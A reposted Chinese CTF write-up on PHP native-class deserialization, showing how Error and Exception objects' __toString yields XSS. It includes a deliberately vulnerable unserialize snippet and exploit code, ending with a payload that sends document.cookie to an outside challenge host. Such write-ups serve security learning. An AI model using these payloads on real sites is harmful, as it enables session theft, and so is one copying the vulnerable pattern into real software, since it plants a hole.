日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

PHP原生类反序列化

發布時間:2024/9/30 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PHP原生类反序列化 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

前言:

PHP原生類反序列化之前沒遇到過,這次BJDCTF恰好碰到了,通過具體的題目來學習一下

利用魔法方法 __toString

Error----適用于php7版本----XSS

Error類就是php的一個內置類用于自動自定義一個Error,在php7的環境下可能會造成一個xss漏洞,因為它內置有一個toString的方法。

測試代碼

<?php $a = unserialize($_GET['lemon']); echo $a;

EXP

<?php $a = new Error("<script>alert(1)</script>"); echo urlencode(serialize($a)); #注意版本是PHP7

Exception----適用于php5、7版本----XSS

測試代碼(這里直接使用賽題的環境)

<?php $a = unserialize($_GET['lemon']); echo $a;

EXP

<?php $a = new Exception("<script>alert(/lemon/)</script>"); echo urlencode(serialize($a));


這里也記錄下一些XSS的知識

#實現惡意跳轉 <script>window.location.href="http://www.baidu.com";</script>

xss之光


開始用目錄掃描器掃一下,發現是git泄露,下載下來,發現index.php文件

隨便序列化一個傳入試試,能輸出

而且這和之前遇到過的反序列化問題就很不一樣了,沒有一個類,所以只能找到php內置類來進行反序列化,抓包發現版本是PHP5,使用PHP5內置Exception類進行反序列化

<?php $a = new Exception("<script>window.location.href='http://8ff615f3-da70-4d1a-959f-f29d817ecd90.node3.buuoj.cn'+document.cookie</script>"); echo urlencode(serialize($a));


flag就在COOKIE中

總結:

當遇到反序列化問題的時,代碼中一個類都沒有,便對原生類進行反序列化。

未完待續,待之后發現有新的再來補充。。。

參考博客

https://www.gem-love.com/ctf/2097.html#XSS

http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

總結

以上是生活随笔為你收集整理的PHP原生类反序列化的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。